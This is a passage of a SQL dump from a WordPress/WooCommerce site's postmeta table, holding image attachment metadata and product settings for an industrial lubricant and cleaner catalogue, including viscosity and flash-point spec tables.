INSERT INTO `wp_postmeta` VALUES (15606, 1617, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:15:"shieldsys-2.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"shieldsys-2-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:23:"shieldsys-2-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"shieldsys-2-160x160.jpg";s:5:"width";i:160;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"shieldsys-2-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (15607, 1618, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:13:"solvsys-2.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:21:"solvsys-2-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:21:"solvsys-2-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:21:"solvsys-2-160x160.jpg";s:5:"width";i:160;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:21:"solvsys-2-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (15608, 1620, '_wp_attached_file', '2016/09/krytox-logo-1-e1473789767370.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15609, 1620, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:40:"2016/09/krytox-logo-1-e1473789767370.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-logo-1-e1473789767370-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-logo-1-e1473789767370-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-logo-1-e1473789767370-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-logo-1-e1473789767370-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15611, 1620, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:17:"krytox-logo-1.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:25:"krytox-logo-1-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:25:"krytox-logo-1-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:25:"krytox-logo-1-160x160.jpg";s:5:"width";i:160;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:25:"krytox-logo-1-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (15612, 1622, '_wp_attached_file', '2016/09/Vazo-logo-1-e1473790044229.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15613, 1622, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:38:"2016/09/Vazo-logo-1-e1473790044229.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Vazo-logo-1-e1473790044229-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Vazo-logo-1-e1473790044229-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Vazo-logo-1-e1473790044229-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Vazo-logo-1-e1473790044229-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15614, 1622, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:15:"Vazo-logo-1.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-logo-1-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-logo-1-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-logo-1-160x160.jpg";s:5:"width";i:160;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"Vazo-logo-1-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (15615, 1624, '_wp_attached_file', '2016/09/Vazo-logo-2-e1473790266583.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15616, 1624, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:38:"2016/09/Vazo-logo-2-e1473790266583.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Vazo-logo-2-e1473790266583-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Vazo-logo-2-e1473790266583-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Vazo-logo-2-e1473790266583-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Vazo-logo-2-e1473790266583-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15617, 1624, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:15:"Vazo-logo-2.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-logo-2-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-logo-2-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-logo-2-160x160.jpg";s:5:"width";i:160;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"Vazo-logo-2-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (15618, 954, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15619, 944, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15620, 956, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15621, 960, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15622, 1077, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15624, 1633, '_wp_attached_file', '2016/09/plastic-metal-glass-cleaner-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15625, 1633, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:41:"2016/09/plastic-metal-glass-cleaner-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"plastic-metal-glass-cleaner-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"plastic-metal-glass-cleaner-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15626, 1634, '_wp_attached_file', '2016/09/contact-cleaner.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15627, 1634, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5337;s:6:"height";i:3558;s:4:"file";s:27:"2016/09/contact-cleaner.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"contact-cleaner-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"contact-cleaner-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"contact-cleaner-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"contact-cleaner-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"contact-cleaner-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"contact-cleaner-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"contact-cleaner-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"contact-cleaner-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15628, 1292, '_thumbnail_id', '1634'); 
INSERT INTO `wp_postmeta` VALUES (15629, 1292, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15630, 1635, '_wp_attached_file', '2016/09/contact-cleaner2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15631, 1635, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4240;s:6:"height";i:2832;s:4:"file";s:28:"2016/09/contact-cleaner2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"contact-cleaner2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"contact-cleaner2-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"contact-cleaner2-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"contact-cleaner2-1600x1069.jpg";s:5:"width";i:1600;s:6:"height";i:1069;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"contact-cleaner2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"contact-cleaner2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"contact-cleaner2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"contact-cleaner2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15632, 1636, '_wp_attached_file', '2016/09/flux-remover2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15633, 1636, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4062;s:6:"height";i:2708;s:4:"file";s:25:"2016/09/flux-remover2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"flux-remover2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"flux-remover2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"flux-remover2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"flux-remover2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"flux-remover2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"flux-remover2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"flux-remover2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"flux-remover2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15634, 1637, '_edit_lock', '1482345280:2'); 
INSERT INTO `wp_postmeta` VALUES (15635, 1637, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (15636, 1637, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (15637, 1637, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (15638, 1637, '312_default_editor', '<table width="706">\r\n<tbody>\r\n<tr>\r\n<td width="219"><strong>Product</strong></td>\r\n<td style="text-align: center;" width="224"><strong>2110</strong></td>\r\n<td style="text-align: center;" width="263"><strong>2111</strong></td>\r\n</tr>\r\n<tr>\r\n<td>ISO VG</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>SAE</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">30</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 40°C</td>\r\n<td style="text-align: center;">95</td>\r\n<td style="text-align: center;">95</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @100°C</td>\r\n<td style="text-align: center;">12.2</td>\r\n<td style="text-align: center;">10.9</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">440</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">67</td>\r\n<td style="text-align: center;">62</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point °F</td>\r\n<td style="text-align: center;">450</td>\r\n<td style="text-align: center;">425</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point °F</td>\r\n<td style="text-align: center;">-31</td>\r\n<td style="text-align: center;">-25</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15639, 1637, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15640, 1637, '716_default_editor', '<ul>\r\n 	<li>Gear Drives</li>\r\n 	<li>Bearings</li>\r\n 	<li>Cams</li>\r\n 	<li>Ways</li>\r\n 	<li>Pumps</li>\r\n 	<li>Chain Baths</li>\r\n 	<li>Slide Configurations</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15641, 1637, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15643, 1637, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15644, 1637, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (15645, 1637, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (15646, 1637, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15647, 1637, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15648, 1637, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (15649, 1637, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15650, 1637, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (15651, 1637, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (15652, 1637, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (15653, 1637, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (15654, 1637, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (15655, 1637, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15656, 1637, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15657, 1637, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15658, 1637, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (15659, 1637, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (15660, 1637, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15661, 1637, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (15662, 1637, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15663, 1637, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15664, 1637, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15665, 1637, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15666, 1637, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15667, 1637, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15668, 1637, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (15669, 1638, '_edit_lock', '1482345318:2'); 
INSERT INTO `wp_postmeta` VALUES (15670, 1638, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (15671, 1638, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (15672, 1638, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (15673, 1638, '312_default_editor', '<table width="706">\r\n<tbody>\r\n<tr>\r\n<td width="219"><strong>Product</strong></td>\r\n<td style="text-align: center;" width="224"><strong>2120</strong></td>\r\n<td style="text-align: center;" width="263"><strong>2121</strong></td>\r\n</tr>\r\n<tr>\r\n<td>ISO VG</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 40°C</td>\r\n<td style="text-align: center;">73</td>\r\n<td style="text-align: center;">106</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @100°C</td>\r\n<td style="text-align: center;">10.7</td>\r\n<td style="text-align: center;">13.2</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">339</td>\r\n<td style="text-align: center;">491</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">62</td>\r\n<td style="text-align: center;">71</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point °F</td>\r\n<td style="text-align: center;">545</td>\r\n<td style="text-align: center;">485</td>\r\n</tr>\r\n<tr>\r\n<td>Autoignition °F</td>\r\n<td style="text-align: center;">794</td>\r\n<td style="text-align: center;">675</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point °F</td>\r\n<td style="text-align: center;">-35</td>\r\n<td style="text-align: center;">-35</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Evaporation Loss (14 hrs @ 400°F)</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">6</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15674, 1638, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15675, 1638, '716_default_editor', '<ul>\r\n 	<li>High Temperature Ovens</li>\r\n 	<li>Tunnels</li>\r\n 	<li>Reflow Ovens</li>\r\n 	<li>Dryers</li>\r\n 	<li>Tenter Frames</li>\r\n 	<li>Shrink Swap Machines</li>\r\n 	<li>Textile Auxillaries</li>\r\n 	<li>Steel</li>\r\n 	<li>Plastic</li>\r\n 	<li>Printing</li>\r\n 	<li>Woodworking Processes</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15676, 1638, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15677, 1638, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15678, 1638, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (15679, 1638, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15680, 1638, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15681, 1638, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (15682, 1638, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15683, 1638, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (15684, 1638, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (15685, 1638, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (15686, 1638, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (15687, 1638, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15688, 1638, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15689, 1638, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15690, 1638, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (15691, 1638, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (15692, 1638, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15693, 1638, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (15694, 1638, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15695, 1638, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15696, 1638, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15697, 1638, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15698, 1638, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15699, 1638, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15700, 1638, '_product_image_gallery', ''); 
